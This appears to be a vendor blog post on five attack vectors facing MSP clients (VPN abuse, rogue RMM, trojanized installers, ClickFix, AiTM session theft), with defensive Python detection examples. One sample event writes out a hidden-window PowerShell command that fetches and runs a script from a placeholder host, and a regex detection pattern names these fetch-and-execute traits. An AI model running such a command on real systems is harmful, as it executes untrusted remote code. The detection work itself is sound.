Are Your MSP Clients Protected Against These 5 Attack Vectors? | 2026 Annual Threat Report

Picture this: one of your clients gets an email that looks like an invoice. They open it, run the attachment, and go back to their day. Somewhere else, a colleague logs into the VPN, same as every morning, and a vendor portal asks them to verify their identity with a quick CAPTCHA. They paste in the command and move on. 

Both moments feel routine. Forgettable, even. But either could be the start of a cybersecurity incident. Last year, interactions like these made up the majority of cases Blackpoint’s SOC observed and contained. 

In this article, we unpack five areas where MSP client environments are most at risk, drawn directly from incident data in Blackpoint’s 2026 Annual Threat Report. For each one: what the data shows, how attackers are using it, and the questions worth running through your client environments right now. 

Is Your Client Environment Exposed? 

These aren’t theoretical vulnerabilities. Each one maps directly to what Blackpoint’s SOC observed and stopped across client environments last year. 

1. SSL VPN Access: When Getting in Means Going Everywhere 

SSL VPN abuse accounted for 33% of identifiable incidents Blackpoint SOC tracked, making it one of the initial access vectors threat actors relied on most last year. SonicWall devices showed up in 59% of those cases.

Compromised VPN credentials are only part of the problem. In most environments, a VPN session lands with broad internal routing, with direct access to domain controllers, backup infrastructure, and RMM consoles. There’s no internal friction; getting in and moving fast are basically the same step. 

Detection and hardening questions: 

  • Does the VPN address pool have direct access to domain controllers or hypervisors? 
  • Are VPN authentication logs monitored for impossible travel, geo anomalies, or off-hours sessions? 
  • When did you last rotate VPN credentials and remove stale accounts? 

Why this matters beyond the technical: A VPN is supposed to be a secure tunnel into your client’s network. The problem is that in many environments, once someone’s in, they can reach everything: servers, backups, admin tools. One stolen password opens the whole building. Making sure VPN access is scoped to only what it actually needs to reach closes a lot of that risk. 
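The second question above (monitoring VPN authentication logs for impossible travel and off-hours sessions) can be turned into a small detection. This is an added example, not Blackpoint's tooling: it assumes VPN logins have already been parsed into records with a resolved geolocation per source IP, and the sample records are constructed.

```python
import math
from datetime import datetime, timezone

# Constructed sample VPN authentication records (not real data): one successful
# login per record, with the source IP's geolocation already resolved.
VPN_LOGINS = [
    {"ts": "2025-03-10T08:02:00Z", "user": "jdoe", "src": "203.0.113.10", "lat": 41.88, "lon": -87.63},
    {"ts": "2025-03-10T08:40:00Z", "user": "jdoe", "src": "198.51.100.7", "lat": 52.52, "lon": 13.40},
    {"ts": "2025-03-10T02:15:00Z", "user": "asmith", "src": "192.0.2.44", "lat": 41.88, "lon": -87.63},
    {"ts": "2025-03-10T09:10:00Z", "user": "asmith", "src": "192.0.2.44", "lat": 41.88, "lon": -87.63},
]

MAX_PLAUSIBLE_KMH = 900.0      # roughly airliner speed; anything faster is impossible travel
BUSINESS_HOURS = range(7, 20)  # 07:00-19:59 UTC; assumed window, adjust per client

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def analyze_vpn_logins(logins):
    """Return (user, reason) findings: off-hours sessions and impossible travel between logins."""
    findings = []
    last_by_user = {}
    for e in sorted(logins, key=lambda e: e["ts"]):
        ts = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        if ts.hour not in BUSINESS_HOURS:
            findings.append((e["user"], f"off-hours login at {e['ts']} from {e['src']}"))
        prev = last_by_user.get(e["user"])
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
            hours = (ts - prev["ts_dt"]).total_seconds() / 3600.0
            # Two logins far apart geographically, closer in time than any traveller could manage.
            if km > 50 and (hours == 0 or km / hours > MAX_PLAUSIBLE_KMH):
                findings.append((e["user"], f"impossible travel: {km:.0f} km in {hours * 60:.0f} min "
                                            f"({prev['src']} -> {e['src']})"))
        last_by_user[e["user"]] = {**e, "ts_dt": ts}
    return findings

if __name__ == "__main__":
    for user, reason in analyze_vpn_logins(VPN_LOGINS):
        print(f"[{user}] {reason}")
```

In the sample data, jdoe authenticates from Chicago and then Berlin 38 minutes apart, and asmith has a 02:15 UTC session; both surface as findings.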

2. Rogue RMM Tools: Including the Ones You Didn’t Install 

RMM tool abuse made up 30.3% of identifiable incidents the Blackpoint SOC handled in 2025. ScreenConnect appeared in 71.5% of those rogue RMM cases, making it the most frequently abused remote management tool Blackpoint tracked. 

What makes rogue RMM installations hard to catch: most MSP client environments already run multiple RMM agents. That’s normal and expected. And that’s exactly what attackers use as cover. The 2026 ATR details the specific RMM abuse campaigns Blackpoint tracked, but the underlying problem is a visibility one. Do you actually know which RMM installs in your clients’ environments belong there? 

Detection and hardening questions: 

  • Do you have an authoritative inventory of which RMM tools are approved for which devices? 
  • Are you monitoring for newly installed RMM agents outside that baseline? 
  • Is application control in place to block unapproved RMM executables? 

Why this matters beyond the technical: RMM tools are how you manage your clients remotely. Attackers know MSP environments have several of them installed already, so they add one more and it blends right in. One unauthorized install gives them persistent remote access that can survive a partial cleanup if the second install gets missed. 

3. Trojanized Installers: Because Users Don’t Know the Difference 

Trojanized installers are one of the more underestimated threats because they exploit something security awareness training can’t fully fix: a user who needs a tool, finds a convincing download page, and installs what they think they need. 

Last year, Blackpoint SOC tracked campaigns impersonating software your clients use every day. The installers ran in a trusted context, performed enough normal behavior to avoid immediate suspicion, and established a foothold before anything looked wrong. The specific applications being spoofed and what got deployed afterward are covered in the report. 

Detection and hardening questions: 

  • Do your clients have restrictions on execution from Downloads, Temp, or AppData directories? 
  • Are you alerting on installer behavior that spawns PowerShell, cmd, or msiexec? 
  • Is there an approved software catalog, or are users finding their own downloads? 

Why this matters beyond the technical: When there’s no approved software list, users Google what they need, find a convincing download page, and click install. Attackers build those pages on purpose. The installer looks real, installs something real, and quietly drops malware at the same time. You can’t train your way out of this one. You have to lock down where software can come from. 

The attacker didn’t need to break anything. They needed a user to click Install. 

4. Fake CAPTCHA and ClickFix Attacks: Exploiting the Habit of Clicking “Verify” 

Fake CAPTCHA and ClickFix attacks were the single largest threat category Blackpoint’s SOC tracked in 2025, accounting for 58% of identifiable incidents. 

If you’ve read how these attacks work, you know the execution path runs through tools Windows already trusts. What’s less discussed is how fake CAPTCHA campaign infrastructure evolved last year in ways that make traditional takedown approaches ineffective. The 2026 ATR covers that in full. The more immediate question is whether the execution paths these attacks depend on are actually locked down in your clients’ environments. 

Detection and hardening questions: 

  • Is the Windows Run dialog (Win+R) restricted via GPO for standard users? 
  • Are you blocking outbound connections to Web3 RPC endpoints? 
  • Do you have behavioral alerting on clipboard-based execution chains? 

Why this matters beyond the technical: Users are used to clicking “I’m not a robot.” Attackers built on that habit. They create fake verification pages that, instead of proving you’re human, ask you to paste a command into Windows and run it. The command looks like nothing. It isn’t. More than half of the incidents Blackpoint’s SOC handled last year started this way. Security awareness training helps. Blocking the execution path helps more. 
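The detection questions for trojanized installers (section 3) and for fake CAPTCHA/ClickFix chains (section 4) both come down to the same telemetry: which process launched which, from where, with what command line. The following is an added example, not Blackpoint's detection logic; it assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine) and the sample events are constructed.

```python
import re
from pathlib import PureWindowsPath

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe", "mshta.exe", "wscript.exe"}
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")
# Command-line traits typical of paste-and-run chains: hidden window, encoded or remotely fetched script.
CLICKFIX_MARKERS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biwr\b|\birm\b|\biex\b|mshta\s+https?://)", re.I)

def _base(path):
    return PureWindowsPath(path).name.lower()

def classify_process_event(ev):
    """Return the rule names matched by one process-creation event (assumed Sysmon EID 1-like fields)."""
    hits = []
    image, parent = _base(ev["Image"]), _base(ev["ParentImage"])
    cmd, parent_path = ev.get("CommandLine", ""), ev["ParentImage"].lower()
    # Rule 1: something running from a user-writable location launches an interpreter (installer behaviour).
    if image in INTERPRETERS and any(d in parent_path for d in USER_WRITABLE):
        hits.append("installer_spawns_interpreter")
    # Rule 2: explorer.exe (host of the Win+R Run dialog) launches an interpreter with paste-and-run traits.
    if parent == "explorer.exe" and image in INTERPRETERS and CLICKFIX_MARKERS.search(cmd):
        hits.append("clickfix_run_dialog_chain")
    # Rule 3: any executable started directly from Downloads/Temp/AppData (execution-restriction check).
    if any(d in ev["Image"].lower() for d in USER_WRITABLE):
        hits.append("exec_from_user_writable_dir")
    return hits

SAMPLE_EVENTS = [  # constructed events, not from a real host
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\jdoe\Downloads\Notepad++_setup.exe",
     "CommandLine": r"powershell.exe -File C:\Users\jdoe\AppData\Local\Temp\post.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://verify.example.invalid/c | iex"'},
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
]

def run_detections(events):
    """Pair each event index with every rule it triggers."""
    return [(i, h) for i, ev in enumerate(events) for h in classify_process_event(ev)]

if __name__ == "__main__":
    for idx, rule in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The first sample event is an installer in Downloads starting PowerShell; the second is the Run-dialog chain a fake CAPTCHA page produces; the third is a normal logon and matches nothing.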

5. MFA Gaps: What Happens After Authentication Succeeds 

MFA is essential. Worth saying directly. The issue is that attackers largely stopped trying to defeat it and started targeting what comes out the other end: the authenticated session. 

AiTM (Adversary-in-the-Middle) phishing was one of the most effective cloud-focused attack techniques Blackpoint’s SOC observed throughout 2025 — and it’s the vector most MSPs haven’t fully accounted for in their client security posture. The attack proxies the authentication flow in real time, capturing the session cookie after a login that succeeds normally. No MFA bypass, no brute force. Just session hijacking after a clean sign-in. 

Detection and hardening questions: 

  • Have you moved client accounts to phishing-resistant MFA (FIDO2/WebAuthn) where possible? 
  • Are you monitoring for OAuth consent grants, new inbox rules, and suspicious application authorizations? 
  • Is conditional access evaluating device compliance and session risk, or just confirming MFA completed? 

Why this matters beyond the technical: MFA still works. Keep using it. But attackers have moved past trying to steal passwords or crack MFA codes. Instead, they let the login succeed normally and then steal the session that gets created afterward. It’s like someone copying your hotel keycard right after you check in. The front desk never knew. Monitoring what happens after a successful login matters just as much as protecting the login itself. 
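Monitoring what happens after a successful login, as the section above recommends, can be expressed as a few rules over sign-in and mailbox audit events. This is an added example, not Blackpoint's detection logic; the events are constructed and only loosely shaped like Microsoft 365 unified audit log records, and the session identifier linking a sign-in to later activity is an assumed field.

```python
# Constructed sample events (not real data), loosely shaped like M365 audit records.
AUDIT_EVENTS = [
    {"ts": "2025-06-02T13:01:00Z", "user": "jdoe@example.invalid", "op": "UserLoggedIn",
     "ip": "203.0.113.10", "session": "S1", "mfa": True},
    # Same session, but the mailbox action arrives from a different IP twelve minutes later.
    {"ts": "2025-06-02T13:13:00Z", "user": "jdoe@example.invalid", "op": "New-InboxRule",
     "ip": "198.51.100.7", "session": "S1",
     "params": {"DeleteMessage": True, "SubjectContainsWords": "invoice"}},
    {"ts": "2025-06-02T13:20:00Z", "user": "jdoe@example.invalid", "op": "Consent to application.",
     "ip": "198.51.100.7", "session": "S1", "params": {"AppDisplayName": "Mail Sync Helper"}},
    {"ts": "2025-06-02T14:00:00Z", "user": "asmith@example.invalid", "op": "UserLoggedIn",
     "ip": "192.0.2.44", "session": "S2", "mfa": True},
    {"ts": "2025-06-02T14:05:00Z", "user": "asmith@example.invalid", "op": "New-InboxRule",
     "ip": "192.0.2.44", "session": "S2", "params": {"MoveToFolder": "Archive"}},
]

# Inbox-rule parameters that hide or exfiltrate mail; a rule that only files messages is benign.
RISKY_RULE_PARAMS = {"DeleteMessage", "ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}

def analyze_post_auth(events):
    """Return (user, op, reason) findings for activity that looks like a hijacked session."""
    findings = []
    session_origin = {}  # session id -> IP that completed the interactive (MFA) sign-in
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["op"] == "UserLoggedIn":
            session_origin[ev["session"]] = ev["ip"]
            continue
        params = ev.get("params", {})
        origin = session_origin.get(ev["session"])
        # Rule 1: a session minted by a clean MFA sign-in is now driven from another network
        # (the pattern an AiTM proxy leaves when the stolen cookie is replayed).
        if origin is not None and origin != ev["ip"]:
            findings.append((ev["user"], ev["op"],
                             f"session {ev['session']} used from {ev['ip']} but signed in from {origin}"))
        # Rule 2: inbox rules that delete or forward mail, a common follow-on after mailbox takeover.
        if ev["op"] == "New-InboxRule" and RISKY_RULE_PARAMS & set(params):
            findings.append((ev["user"], ev["op"], "inbox rule deletes or forwards mail"))
        # Rule 3: every new OAuth consent is reviewed; the grant persists independently of password resets.
        if ev["op"].startswith("Consent to application"):
            findings.append((ev["user"], ev["op"], f"new app consent: {params.get('AppDisplayName')}"))
    return findings

if __name__ == "__main__":
    for user, op, reason in analyze_post_auth(AUDIT_EVENTS):
        print(f"[{user}] {op}: {reason}")
```

Only jdoe's events produce findings: the session changes network after the sign-in, the new rule deletes invoice mail, and an application is granted consent from the same foreign IP.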

Protect Your MSP Clients From These Threats in 2026 

If any of these areas look familiar in your client environments, the 2026 Annual Threat Report goes deeper on all of them — full attack chain walkthroughs, detection patterns, the complete vulnerability landscape from 2025, and defense frameworks built from what Blackpoint’s SOC observed in the field. Download the 2026 Annual Threat Report now. 

Date published: May 1, 2026
Author: Blackpoint Cyber
